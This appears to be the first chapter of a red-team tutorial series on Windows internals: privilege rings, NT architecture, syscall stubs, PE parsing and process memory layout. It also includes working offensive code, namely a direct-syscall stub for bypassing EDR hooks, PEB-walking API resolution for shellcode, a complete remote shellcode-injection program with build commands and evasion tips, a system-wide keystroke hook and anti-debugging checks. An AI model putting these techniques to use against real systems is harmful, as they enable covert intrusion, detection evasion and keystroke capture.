Ring 3 Field Notes

NT internals, syscall mechanics, PE format and the memory model, before any shellcode

You cannot write Windows offensive tooling without knowing what you are standing on. This covers the kernel/user boundary, NT architecture, syscall mechanics, PE format, and memory layout: the material that should come before injection tutorials.

before any shellcode

Red team tooling on Windows runs on a specific stack of abstractions. Most tutorials skip to the interesting part: injecting shellcode, unhooking NTDLL, bypassing AMSI. They skip what those operations actually do at the CPU level.

That is a problem. You can copy-paste a process injection snippet without understanding why it works, but you cannot debug it when it breaks, adapt it when defenses change, or write anything original.

This is the floor. Kernel mode. User mode. How they communicate. What lives where. What the PE format is. How memory is organized. The Windows API hierarchy from Win32 down to syscall.


ring 0 and ring 3

The x86/x64 architecture defines four privilege levels, “rings” numbered 0 through 3. Windows uses two of them:

[figure: CPU privilege rings; Ring 0 is kernel, Ring 3 is user applications]

  • Ring 3 (User Mode): where your applications run. Restricted access to hardware, memory, and CPU instructions. An attempt to execute a privileged instruction raises #GP (General Protection Fault).
  • Ring 0 (Kernel Mode): where the OS kernel, HAL, and device drivers run. Unrestricted. A bug here crashes the entire system.

Ring 3 (User Mode)
├── Win32 applications
├── Win32 subsystem (csrss.exe)
├── WoW64 (32-bit on 64-bit)
└── NTDLL.DLL (user-mode stub layer)
         ↕ syscall boundary
Ring 0 (Kernel Mode)
├── NT Executive
│   ├── Object Manager
│   ├── Process Manager
│   ├── Memory Manager
│   ├── I/O Manager
│   ├── Security Reference Monitor
│   └── Cache Manager
├── NT Kernel (ntoskrnl.exe)
├── HAL (hal.dll)
└── Device Drivers (*.sys)
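The ring is tracked by the CPU itself, not by Windows: the Current Privilege Level (CPL) is the low two bits of the CS segment selector. A minimal sketch, assuming the code selectors Windows x64 loads into CS (0x33 for 64-bit user code, 0x23 for WoW64 user code, 0x10 for kernel code); `cpl_from_cs` and `read_cs` are illustrative helpers, and `read_cs` only builds with GCC/Clang on x86-64:

```c
#include <stdint.h>

/* CPL = the two low bits (RPL field) of the CS selector currently loaded. */
static unsigned cpl_from_cs(uint16_t cs) {
    return cs & 0x3u;
}

/* Code selectors used by Windows x64 (index into the GDT, plus RPL). */
enum {
    CS_USER64 = 0x33,   /* 64-bit user code, ring 3 */
    CS_USER32 = 0x23,   /* 32-bit (WoW64) user code, ring 3 */
    CS_KERNEL = 0x10    /* kernel code, ring 0 */
};

#if defined(__GNUC__) && defined(__x86_64__)
/* Read the live CS selector of the calling thread. */
uint16_t read_cs(void) {
    uint16_t cs;
    __asm__ volatile ("mov %%cs, %0" : "=r"(cs));
    return cs;
}
#endif
```

Any user-mode process on x86-64 that calls `cpl_from_cs(read_cs())` gets 3; only code running in ring 0 would see 0.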

When a user-mode application wants to do anything meaningful (allocate memory, create a process, open a file), it crosses the ring boundary via a system call. The transition costs far more than an ordinary function call, and the user-mode path leading up to it is exactly where EDRs place their hooks.


NT executive and the HAL

[figure: Windows NT architecture; user mode (POSIX, Win32 and OS/2 subsystems) over kernel mode (system services, HAL)]

The Hardware Abstraction Layer (HAL) sits between the kernel and physical hardware. It abstracts platform-specific differences so the rest of the kernel can be hardware-agnostic.

The NT Executive is the upper layer of ntoskrnl.exe:

Component                     Responsibility
----------------------------  ---------------------------------------------------------
Object Manager                uniform naming and access control for kernel objects
Process Manager               process and thread creation, scheduling handoff
Virtual Memory Manager        page table management, working set trimming, mapped files
I/O Manager                   device driver model, IRP dispatch
Security Reference Monitor    access checks, audit logging, privilege validation
Cache Manager                 file system caching, mapped views
Configuration Manager         registry implementation

These are components within ntoskrnl.exe, not separate DLLs.

[figure: detailed NT architecture; executive services, integral and environment subsystems, kernel-mode drivers, HAL, hardware]


the syscall layer: NTDLL and Native API

NTDLL.DLL is the bridge between user mode and the kernel. Each NT function is a thin wrapper that loads a syscall number into eax and executes syscall:

; NtAllocateVirtualMemory stub in NTDLL (Windows 10 21H2, x64)
mov r10, rcx                            ; syscall overwrites rcx (return RIP), so arg 1 moves to r10
mov eax, 0x18                           ; System Service Number (SSN)
test byte [SharedUserData+0x308], 0x1   ; KUSER_SHARED_DATA.SystemCall (0x7FFE0308)
jne  .int2e                             ; legacy path
syscall                                 ; cross the ring boundary
ret
.int2e:
int 0x2e                                ; legacy software-interrupt entry
ret

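The number in eax is the System Service Number (SSN), an index into the kernel's system service table. SSNs are not stable across Windows versions: NtAllocateVirtualMemory is 0x18 on Windows 10 21H2 but had different numbers on Windows 7 and 8.x, and many other SSNs shift between Windows 10 and 11 feature updates, so a hardcoded SSN ties a tool to specific builds.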

This matters for direct syscalls: calling syscall directly from your code without going through NTDLL, bypassing userland hooks placed by EDRs.

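// direct syscall stub (inline asm, illustrative only: the operand constraints
// are simplified and arguments 5-6 are not placed where the kernel expects them)
// intent: EDR hooks inside NTDLL's stubs are never executed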
NTSTATUS NtAllocateVirtualMemory_syscall(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
) {
    // SSN resolved at runtime via Hell's Gate or SysWhispers
    NTSTATUS status;
    __asm__ volatile (
        "mov r10, rcx\n"
        "mov eax, %1\n"
        "syscall\n"
        "mov %0, eax\n"
        : "=r"(status)
        : "r"(SSN_NtAllocateVirtualMemory)
        : "r10", "eax", "memory"
    );
    return status;
}

Tools that implement SSN resolution dynamically: SysWhispers3, Hell's Gate, Halo's Gate (handles patched stubs).


the Win32 API hierarchy

[figure: general architecture; system processes → subsystem DLLs → NTDLL.DLL ↕ kernel mode (executive, drivers, HAL)]

Win32 API (kernel32.dll, user32.dll, advapi32.dll)
           ↓
NTDLL Native API (ntdll.dll)
           ↓
System Call Interface (syscall instruction)
           ↓
NT Executive (ntoskrnl.exe)

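CreateProcessW() in kernel32.dll passes through to CreateProcessInternalW() (implemented in kernelbase.dll on current Windows), which calls NtCreateUserProcess() in ntdll.dll; that stub executes a syscall into the kernel. The kernel validates arguments, checks security, creates the process and initial thread objects, and returns an NTSTATUS.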

[figure: DLL relationships; GDI32/USER32 and ADVAPI32 → KERNEL32 → KERNELBASE → NTDLL → syscall boundary]

EDRs hook at the NTDLL layer (easiest, most stable). Direct syscalls bypass this. Kernel callbacks (PsSetCreateProcessNotifyRoutine, ObRegisterCallbacks) catch things that slip past NTDLL hooks.


the PE format

[figure: PE on-disk layout; DOS header, DOS stub, NT headers, section table, .text/.data/.rdata/.rsrc sections]

Every executable, DLL, and driver on Windows uses the Portable Executable format.

┌────────────────────┐
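│  DOS Header        │  "MZ" magic, e_lfanew offset to NT headers
├────────────────────┤
│  DOS Stub          │  small real-mode program ("This program cannot be run in DOS mode")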
├────────────────────┤
│  NT Headers        │  "PE\0\0" + File Header + Optional Header
├────────────────────┤
│  Section Table     │  entries for .text, .data, .rdata, .rsrc
├────────────────────┤
│  .text             │  executable code
├────────────────────┤
│  .data             │  initialized global/static data
├────────────────────┤
│  .rdata            │  read-only data, import/export tables
├────────────────────┤
│  .rsrc             │  resources
└────────────────────┘
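The layout above can be walked with nothing but byte offsets, which is how a parser has to work on a raw file or any buffer it cannot trust. A sketch assuming a PE32+ image; `pe_summarize` and `struct pe_summary` are names made up for this example, and the offsets are those of IMAGE_DOS_HEADER.e_lfanew (0x3C), IMAGE_FILE_HEADER and IMAGE_OPTIONAL_HEADER64:

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* PE fields are always little-endian. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static uint64_t rd64(const uint8_t *p) {
    return (uint64_t)rd32(p) | ((uint64_t)rd32(p + 4) << 32);
}

struct pe_summary {
    uint16_t machine;        /* e.g. 0x8664 = AMD64 */
    uint16_t num_sections;
    uint16_t magic;          /* 0x20B = PE32+ */
    uint32_t entry_rva;      /* AddressOfEntryPoint */
    uint64_t image_base;     /* preferred load address */
    uint32_t first_section;  /* file offset of the section table */
};

/* Returns 0 on success, -1 if buf does not hold a well-formed PE32+ header. */
static int pe_summarize(const uint8_t *buf, size_t len, struct pe_summary *out) {
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return -1;                                   /* DOS header, "MZ" */
    uint32_t nt = rd32(buf + 0x3C);                  /* e_lfanew */
    if (nt > len || len - nt < 24 || memcmp(buf + nt, "PE\0\0", 4) != 0)
        return -1;                                   /* signature + file header */
    const uint8_t *fh = buf + nt + 4;                /* IMAGE_FILE_HEADER */
    uint16_t opt_size = rd16(fh + 16);               /* SizeOfOptionalHeader */
    const uint8_t *oh = fh + 20;                     /* IMAGE_OPTIONAL_HEADER64 */
    if (opt_size < 32 || (size_t)(oh - buf) + opt_size > len || rd16(oh) != 0x20B)
        return -1;
    out->machine       = rd16(fh);
    out->num_sections  = rd16(fh + 2);
    out->magic         = rd16(oh);
    out->entry_rva     = rd32(oh + 16);
    out->image_base    = rd64(oh + 24);              /* PE32+ layout only */
    out->first_section = (uint32_t)(oh - buf) + opt_size;
    return 0;
}
```

Unlike a parser that trusts a loaded module, this version bounds-checks each offset before reading it, so it can be pointed at bytes read from disk.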

Key fields in IMAGE_OPTIONAL_HEADER64:

WORD   Magic;               // 0x20B = PE32+ (64-bit)
DWORD  AddressOfEntryPoint; // RVA of entry point
ULONGLONG ImageBase;        // preferred load address
DWORD  SectionAlignment;    // section alignment in memory
DWORD  FileAlignment;       // section alignment on disk
DWORD  SizeOfImage;         // total image size when mapped
IMAGE_DATA_DIRECTORY DataDirectory[16]; // imports, exports, TLS, relocations...
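SectionAlignment and FileAlignment are why an RVA is not a file offset: sections are padded differently in memory and on disk, so translating one into the other goes through the section table. A sketch with a hypothetical `struct section` holding just the four IMAGE_SECTION_HEADER fields involved, assuming power-of-two alignments:

```c
#include <stdint.h>
#include <stddef.h>

/* Subset of IMAGE_SECTION_HEADER needed for address translation. */
struct section {
    uint32_t virtual_address;   /* RVA where the section is mapped */
    uint32_t virtual_size;      /* size in memory */
    uint32_t raw_pointer;       /* PointerToRawData: file offset */
    uint32_t raw_size;          /* SizeOfRawData: FileAlignment multiple */
};

/* Round v up to a power-of-two alignment (SectionAlignment or FileAlignment). */
static uint32_t align_up(uint32_t v, uint32_t a) {
    return (v + a - 1) & ~(a - 1);
}

/* Translate an RVA into a file offset. Returns -1 if the RVA is in no
   section, or only in the zero-filled tail that has no bytes on disk. */
static int64_t rva_to_offset(const struct section *s, size_t n, uint32_t rva) {
    for (size_t i = 0; i < n; i++) {
        uint32_t span = s[i].virtual_size ? s[i].virtual_size : s[i].raw_size;
        if (rva >= s[i].virtual_address && rva - s[i].virtual_address < span) {
            uint32_t delta = rva - s[i].virtual_address;
            if (delta >= s[i].raw_size)
                return -1;              /* exists in memory only */
            return (int64_t)s[i].raw_pointer + delta;
        }
    }
    return -1;
}
```

The memory-only case matters: when VirtualSize exceeds SizeOfRawData, the loader zero-fills the difference, so those RVAs are valid at runtime but map to nothing in the file.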

The Import Address Table (IAT) is populated by the loader when the PE is mapped. It holds the resolved addresses of all imported functions. IAT patching (replacing a function pointer with your own) is one of the simplest hooking techniques.

parsing a PE header in C

#include <windows.h>
#include <stdio.h>

void parse_pe(PVOID base) {
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)base;
    if (dos->e_magic != IMAGE_DOS_SIGNATURE) return;  // "MZ"

    PIMAGE_NT_HEADERS64 nt = (PIMAGE_NT_HEADERS64)(
        (PBYTE)base + dos->e_lfanew
    );
    if (nt->Signature != IMAGE_NT_SIGNATURE) return;  // "PE\0\0"
    if (nt->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) return;  // 0x20B, PE32+

    printf("ImageBase:  0x%llx\n", nt->OptionalHeader.ImageBase);
    printf("EntryPoint: 0x%lx (RVA)\n", nt->OptionalHeader.AddressOfEntryPoint);
    printf("Sections:   %d\n", nt->FileHeader.NumberOfSections);

    PIMAGE_SECTION_HEADER sect = IMAGE_FIRST_SECTION(nt);
    for (int i = 0; i < nt->FileHeader.NumberOfSections; i++, sect++) {
        // Name is 8 bytes and not NUL-terminated when all 8 are used,
        // so the precision (.8) caps how far printf reads
        printf("  [%d] %-8.8s  RVA: 0x%08lx  Size: 0x%lx\n",
               i,
               (const char *)sect->Name,
               sect->VirtualAddress,
               sect->Misc.VirtualSize);
    }
}

int main() {
    HMODULE h = GetModuleHandleA("kernel32.dll");
    parse_pe(h);
    return 0;
}

process memory layout

[figure: 32-bit Win32 memory map; stack (grows down), heap (grows up), program image, DLLs, TEB, PEB, kernel land at 0x7FFF0000]

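A user-mode process on Windows x64 (8.1 and later) has a 128 TB virtual address space. With ASLR, the regions in the middle are not stacked in a fixed order:

0x0000000000010000   lowest valid user address (the first 64 KB are never mapped)
...
    [PE image]       the executable itself
    [heaps]          the process default heap plus any private heaps
    [mapped files]   DLLs, memory-mapped files
    [stacks]         one per thread, grows downward, 1 MB reserved by default
...
0x00007FFFFFFEFFFF   highest usable user-mode address (the user half ends at 0x00007FFFFFFFFFFF)
0xFFFF800000000000   kernel space (inaccessible from ring 3)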
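Those boundaries are enough to sort any pointer into a region. A sketch assuming the usual Windows x64 layout with 4-level paging (48-bit canonical addresses): the first 64 KB and the last 64 KB of the 0x00007FFFFFFFFFFF user half are never mapped, and kernel space starts at 0xFFFF800000000000. `classify_va` is an illustrative helper, not a Windows API:

```c
#include <stdint.h>

enum va_class { VA_NULL_GUARD, VA_USER, VA_USER_RESERVED, VA_NONCANONICAL, VA_KERNEL };

/* Classify a 64-bit virtual address (LA57 / 5-level paging not considered). */
static enum va_class classify_va(uint64_t va) {
    if (va < 0x10000ULL)
        return VA_NULL_GUARD;             /* first 64 KB, never mapped */
    if (va <= 0x00007FFFFFFEFFFFULL)
        return VA_USER;
    if (va <= 0x00007FFFFFFFFFFFULL)
        return VA_USER_RESERVED;          /* last 64 KB of the user half */
    if (va < 0xFFFF800000000000ULL)
        return VA_NONCANONICAL;           /* bits 63..47 not all equal: #GP on use */
    return VA_KERNEL;
}
```

For example, KUSER_SHARED_DATA at 0x7FFE0000 classifies as user memory (it is mapped read-only into every process), while 0x0000800000000000 is in the non-canonical hole.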

The Process Environment Block (PEB) and Thread Environment Block (TEB) are critical structures. In 64-bit mode the gs segment base points to the current thread's TEB, and gs:[0x60] is the TEB field holding the pointer to the PEB (on 32-bit Windows, fs:[0x30]).


PEB walking: resolve kernel32 without imports

Shellcode cannot use the IAT (it has no image base, no loader). The standard technique is to walk the PEB’s module list and find kernel32.dll by hashing the name.

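#include <windows.h>
#include <winternl.h>
#include <intrin.h>
#include <stdio.h>

// winternl.h only exposes part of LDR_DATA_TABLE_ENTRY (BaseDllName is
// hidden in its Reserved fields), so declare the long-stable prefix of the
// real, undocumented structure ourselves
typedef struct _LDR_ENTRY_PREFIX {
    LIST_ENTRY     InLoadOrderLinks;
    LIST_ENTRY     InMemoryOrderLinks;
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
} LDR_ENTRY_PREFIX, *PLDR_ENTRY_PREFIX;

// djb2 hash of a counted wide string (module names in the PEB are
// UNICODE_STRINGs: Length is in bytes and excludes any terminator)
DWORD hash_module_name(PCWSTR name, USHORT length_bytes) {
    DWORD h = 5381;
    for (USHORT i = 0; i < length_bytes / sizeof(WCHAR); i++)
        h = ((h << 5) + h) + (DWORD)(name[i] | 0x20); // crude ASCII lowercase
    return h;
}

// find a loaded module by name hash
PVOID find_module(DWORD target_hash) {
    PPEB peb;
#ifdef _WIN64
    peb = (PPEB)__readgsqword(0x60);   // TEB->ProcessEnvironmentBlock
#else
    peb = (PPEB)__readfsdword(0x30);
#endif

    PPEB_LDR_DATA ldr = peb->Ldr;
    PLIST_ENTRY head = &ldr->InMemoryOrderModuleList;
    PLIST_ENTRY cur  = head->Flink;

    while (cur != head) {
        PLDR_ENTRY_PREFIX entry = CONTAINING_RECORD(
            cur,
            LDR_ENTRY_PREFIX,
            InMemoryOrderLinks
        );

        if (entry->BaseDllName.Buffer) {
            DWORD h = hash_module_name(entry->BaseDllName.Buffer,
                                       entry->BaseDllName.Length);
            if (h == target_hash) {
                return entry->DllBase;
            }
        }
        cur = cur->Flink;
    }
    return NULL;
}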

// resolve an exported function by name hash
PVOID find_export(PVOID module_base, DWORD func_hash) {
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)module_base;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)(
        (PBYTE)module_base + dos->e_lfanew
    );

    DWORD export_rva = nt->OptionalHeader
        .DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
        .VirtualAddress;
    PIMAGE_EXPORT_DIRECTORY exports = (PIMAGE_EXPORT_DIRECTORY)(
        (PBYTE)module_base + export_rva
    );

    PDWORD  names    = (PDWORD) ((PBYTE)module_base + exports->AddressOfNames);
    PWORD   ordinals = (PWORD)  ((PBYTE)module_base + exports->AddressOfNameOrdinals);
    PDWORD  funcs    = (PDWORD) ((PBYTE)module_base + exports->AddressOfFunctions);

    for (DWORD i = 0; i < exports->NumberOfNames; i++) {
        PCHAR  name = (PCHAR)((PBYTE)module_base + names[i]);
        DWORD  h    = 5381;
        for (PCHAR c = name; *c; c++)
            h = ((h << 5) + h) + (DWORD)*c;

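        if (h == func_hash) {
            // forwarded exports (RVA inside the export directory) point at
            // a "DLL.Function" string rather than code; not handled here
            return (PVOID)((PBYTE)module_base + funcs[ordinals[i]]);
        }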
    }
    return NULL;
}

int main(void) {
    // kernel32.dll hash (djb2 of "kernel32.dll", lowercased)
    PVOID k32 = find_module(0x7040ee75);
    if (!k32) {
        printf("kernel32.dll not found\n");
        return 1;
    }
    printf("kernel32.dll base: %p\n", k32);

    // VirtualAlloc hash
    PVOID va = find_export(k32, 0x382c0f97);
    printf("VirtualAlloc: %p\n", va);

    return 0;
}
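find_export relies on two details of the export directory that are easy to get wrong: AddressOfNameOrdinals holds indexes straight into AddressOfFunctions (the directory's Base is not subtracted), and a function RVA that lands inside the export directory itself is a forwarder string, not code. A sketch modelling both with plain arrays; the function names are hypothetical and, unlike a real image, `names` already holds C strings instead of RVAs:

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* names[i] pairs with name_ordinals[i], which indexes funcs[] directly. */
static uint32_t export_rva_by_name(const char *const *names,
                                   const uint16_t *name_ordinals,
                                   const uint32_t *funcs, size_t num_names,
                                   const char *want) {
    for (size_t i = 0; i < num_names; i++)
        if (strcmp(names[i], want) == 0)
            return funcs[name_ordinals[i]];
    return 0;   /* not exported by name */
}

/* A forwarder's RVA points into the export directory, at a string of the
   form "OTHERDLL.Function" that the loader resolves instead. */
static int is_forwarder(uint32_t func_rva, uint32_t dir_rva, uint32_t dir_size) {
    return func_rva >= dir_rva && func_rva - dir_rva < dir_size;
}
```

The name and ordinal arrays are parallel, but the function array is not: it is ordered by ordinal, which is why the lookup needs the extra indirection.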

To get the hash values for a specific function:

// compute djb2 hashes offline with a helper like this (or a quick script)
DWORD djb2(const char *s) {
    DWORD h = 5381;
    while (*s)
        h = ((h << 5) + h) + (DWORD)*s++;
    return h;
}

// djb2("VirtualAlloc") = 0x382c0f97
// djb2("kernel32.dll") lowercased = 0x7040ee75
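A quick way to check the constants above, including the | 0x20 case fold that find_module applies to the PEB's wide module names (the loader may record a name in uppercase, e.g. KERNEL32.DLL). A sketch in portable C; it uses uint16_t for UTF-16 code units so it also builds off Windows, and both function names are illustrative:

```c
#include <stdint.h>
#include <stddef.h>

/* djb2 over an ASCII string, as find_export hashes export names. */
static uint32_t djb2_ascii(const char *s) {
    uint32_t h = 5381;
    while (*s)
        h = ((h << 5) + h) + (uint8_t)*s++;
    return h;
}

/* djb2 over a counted UTF-16 name with the same "| 0x20" fold as
   hash_module_name. The fold lowercases ASCII letters but also alters
   some other characters (e.g. '_' 0x5F becomes 0x7F). */
static uint32_t djb2_utf16_folded(const uint16_t *s, size_t n) {
    uint32_t h = 5381;
    for (size_t i = 0; i < n; i++)
        h = ((h << 5) + h) + (uint32_t)(s[i] | 0x20);
    return h;
}
```

Both spellings of the module name produce 0x7040ee75, which is why the lookup does not care how the loader cased the entry.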

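The technique is position-independent in principle: it uses no hardcoded addresses, only the TEB/PEB reached through gs (fs on 32-bit) and the loader's own module list. The C above is not shellcode yet; it still has to be converted to real PIC (no globals, no string literals, no CRT calls) before it can go into a payload. Once converted, it resolves exports on any Windows version where kernel32 is loaded, which covers every normal Win32 process. Forwarded exports are the one common case it does not handle.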


basic process injection skeleton

With the underlying layers established, here is the minimal injection template using standard Win32 APIs:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   // atoi

// calc.exe shellcode (x64, msfvenom -p windows/x64/exec CMD=calc.exe -f c)
unsigned char shellcode[] = {
    0x48, 0x31, 0xc9, 0x48, 0x81, 0xe9, 0xdd, 0xff, 0xff, 0xff,
    // ... full shellcode bytes
};
SIZE_T shellcode_len = sizeof(shellcode);

BOOL inject(DWORD pid) {
    HANDLE hProc = OpenProcess(
        PROCESS_ALL_ACCESS,
        FALSE,
        pid
    );
    if (!hProc) {
        printf("[-] OpenProcess failed: %lu\n", GetLastError());
        return FALSE;
    }

    // allocate RWX memory in target process
    PVOID remote_buf = VirtualAllocEx(
        hProc,
        NULL,
        shellcode_len,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (!remote_buf) {
        printf("[-] VirtualAllocEx failed: %lu\n", GetLastError());
        CloseHandle(hProc);
        return FALSE;
    }

    // write shellcode
    SIZE_T written = 0;
    if (!WriteProcessMemory(hProc, remote_buf, shellcode, shellcode_len, &written)) {
        printf("[-] WriteProcessMemory failed: %lu\n", GetLastError());
        VirtualFreeEx(hProc, remote_buf, 0, MEM_RELEASE);
        CloseHandle(hProc);
        return FALSE;
    }

    // create remote thread at shellcode entry point
    HANDLE hThread = CreateRemoteThread(
        hProc,
        NULL,
        0,
        (LPTHREAD_START_ROUTINE)remote_buf,
        NULL,
        0,
        NULL
    );
    if (!hThread) {
        printf("[-] CreateRemoteThread failed: %lu\n", GetLastError());
        VirtualFreeEx(hProc, remote_buf, 0, MEM_RELEASE);
        CloseHandle(hProc);
        return FALSE;
    }

    printf("[+] thread created in PID %lu at %p\n", pid, remote_buf);
    WaitForSingleObject(hThread, 3000);
    CloseHandle(hThread);
    CloseHandle(hProc);
    return TRUE;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("usage: inject.exe <pid>\n");
        return 1;
    }
    DWORD pid = (DWORD)atoi(argv[1]);
    inject(pid);
    return 0;
}

Cross-compile from Linux with MinGW-w64:

x86_64-w64-mingw32-gcc inject.c -o inject.exe -lkernel32

Or compile natively with MSVC from a Developer Command Prompt:

cl.exe inject.c /Fe:inject.exe

This is the baseline. A PAGE_EXECUTE_READWRITE allocation in a remote process is one of the strongest signals EDRs look for, so expect this exact pattern to be flagged. In practice you allocate PAGE_READWRITE, write the shellcode, then VirtualProtectEx to PAGE_EXECUTE_READ. You also replace CreateRemoteThread with NtCreateThreadEx or APC injection to avoid the obvious API pattern. But understand this before touching those variants.


essential native API calls

// memory operations
NtAllocateVirtualMemory(ProcessHandle, &BaseAddress, 0, &RegionSize,
                         MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
NtWriteVirtualMemory(ProcessHandle, BaseAddress, Buffer, Size, &BytesWritten);
NtProtectVirtualMemory(ProcessHandle, &BaseAddress, &RegionSize,
                        PAGE_EXECUTE_READ, &OldProtect);

// process and thread
NtOpenProcess(&ProcessHandle, PROCESS_ALL_ACCESS, &ObjAttr, &ClientId);
NtCreateThreadEx(&ThreadHandle, THREAD_ALL_ACCESS, NULL,
                  ProcessHandle, StartAddr, Param, 0, 0, 0, 0, NULL);

// information queries
NtQuerySystemInformation(SystemProcessInformation, Buffer, Size, &ReturnLength);
NtQueryInformationProcess(ProcessHandle, ProcessBasicInformation,
                           &PBI, sizeof(PBI), NULL);

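NTSTATUS success is 0x00000000 (STATUS_SUCCESS). NT_SUCCESS(status) is simply status >= 0 on the signed 32-bit value, i.e. a test of the high bit: any value with bit 31 clear is success or informational, while warnings (0x8xxxxxxx) and errors (0xCxxxxxxx) fail it.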
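The rest of the value can be taken apart field by field. A sketch following the documented NTSTATUS layout (severity in bits 31-30, customer flag in bit 29, facility in bits 27-16, code in bits 15-0); `ntstatus_t` stands in for NTSTATUS so the example builds without the Windows headers, and the helper names are illustrative:

```c
#include <stdint.h>

typedef int32_t ntstatus_t;   /* NTSTATUS is a signed 32-bit LONG */

enum nt_severity { SEV_SUCCESS = 0, SEV_INFORMATIONAL = 1, SEV_WARNING = 2, SEV_ERROR = 3 };

/* Same test as the NT_SUCCESS macro: non-negative means success/informational. */
static int nt_success(ntstatus_t s) { return s >= 0; }

static enum nt_severity nt_sev(ntstatus_t s) {
    return (enum nt_severity)(((uint32_t)s >> 30) & 0x3u);
}
static unsigned nt_customer(ntstatus_t s) { return ((uint32_t)s >> 29) & 0x1u; }
static unsigned nt_facility(ntstatus_t s) { return ((uint32_t)s >> 16) & 0xFFFu; }
static unsigned nt_code(ntstatus_t s)     { return (uint32_t)s & 0xFFFFu; }
```

STATUS_PENDING (0x103) passes NT_SUCCESS even though the operation is not finished, and STATUS_BUFFER_OVERFLOW (0x80000005) fails it despite being only a warning; both are common sources of wrong error handling around native calls.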


Windows hooks: SetWindowsHookEx

HHOOK hHook = SetWindowsHookEx(
    WH_KEYBOARD_LL,   // low-level keyboard hook, system-wide
    KeyboardProc,     // callback
    NULL,             // NULL for LL hooks (no DLL injection needed)
    0                 // 0 = all threads
);

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
    if (nCode == HC_ACTION) {
        PKBDLLHOOKSTRUCT kb = (PKBDLLHOOKSTRUCT)lParam;
        printf("key: %lu\n", kb->vkCode);
    }
    return CallNextHookEx(hHook, nCode, wParam, lParam);
}

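For WH_KEYBOARD_LL and WH_MOUSE_LL, the callback runs on the thread that installed the hook (no DLL injection), and that thread must be pumping messages for the callback to be called. For other global hook types (WH_KEYBOARD, WH_CBT), the hook procedure must live in a DLL, which Windows loads into each process (of matching bitness) whose threads trigger the hook.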


vectored exception handling

VEH registers a handler called before any frame-based SEH. Used for debugger detection, hardware breakpoint monitoring, and anti-analysis.

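LONG WINAPI VehHandler(PEXCEPTION_POINTERS ex) {
    switch (ex->ExceptionRecord->ExceptionCode) {
        case STATUS_SINGLE_STEP:
            // hardware breakpoint hit (DR0-DR3) or trap-flag single step
            printf("[!] hardware breakpoint at %p\n",
                   ex->ExceptionRecord->ExceptionAddress);
            // set the Resume Flag (EFLAGS bit 16) so an execute breakpoint
            // does not fire again on the same instruction after resuming
            ex->ContextRecord->EFlags |= 0x10000;
            return EXCEPTION_CONTINUE_EXECUTION;

        case STATUS_ACCESS_VIOLATION:
            return EXCEPTION_CONTINUE_SEARCH;   // not ours: pass it on to SEH

        default:
            return EXCEPTION_CONTINUE_SEARCH;
    }
}

// register from main() or an init routine; 1 = first in the VEH chain
PVOID hVeh = AddVectoredExceptionHandler(1, VehHandler);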

To detect hardware breakpoints:

CONTEXT ctx = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
GetThreadContext(GetCurrentThread(), &ctx);
if (ctx.Dr0 || ctx.Dr1 || ctx.Dr2 || ctx.Dr3) {
    // breakpoint registers in use, likely debugger attached
}
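A nonzero Dr0-Dr3 only means an address has been loaded; whether a breakpoint is actually armed, and on what kind of access, is encoded in Dr7, which the same CONTEXT_DEBUG_REGISTERS query returns as ctx.Dr7. A sketch of decoding it per slot, following the DR7 layout in the Intel SDM; `struct hwbp` and `decode_dr7` are illustrative names:

```c
#include <stdint.h>

/* Per-slot view of DR7 for breakpoint i (0-3, matching Dr0-Dr3). */
struct hwbp {
    int      armed;   /* local (L) or global (G) enable bit set */
    unsigned rw;      /* 0 = execute, 1 = write, 2 = I/O, 3 = read/write */
    unsigned len;     /* 0 = 1 byte, 1 = 2 bytes, 2 = 8 bytes (64-bit), 3 = 4 bytes */
};

static struct hwbp decode_dr7(uint64_t dr7, unsigned i) {
    struct hwbp bp;
    bp.armed = ((dr7 >> (2 * i)) & 0x3u) != 0;           /* Li at bit 2i, Gi at 2i+1 */
    bp.rw    = (unsigned)((dr7 >> (16 + 4 * i)) & 0x3u);  /* R/Wi field */
    bp.len   = (unsigned)((dr7 >> (18 + 4 * i)) & 0x3u);  /* LENi field */
    return bp;
}
```

On Windows, the check above then becomes decode_dr7(ctx.Dr7, i).armed for i in 0..3, which ignores addresses left in debug registers that are no longer enabled.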

what’s next

Chapter 2: shellcode development. Position-independent code, PEB walking as actual shellcode (not C), API hashing, encoding and encryption, stager patterns.

Chapter 3: process injection variants. APC injection, NtMapViewOfSection + threadless execution, module stomping, process hollowing.

Build the understanding first. The shellcode makes sense once you know what it is doing and why.


references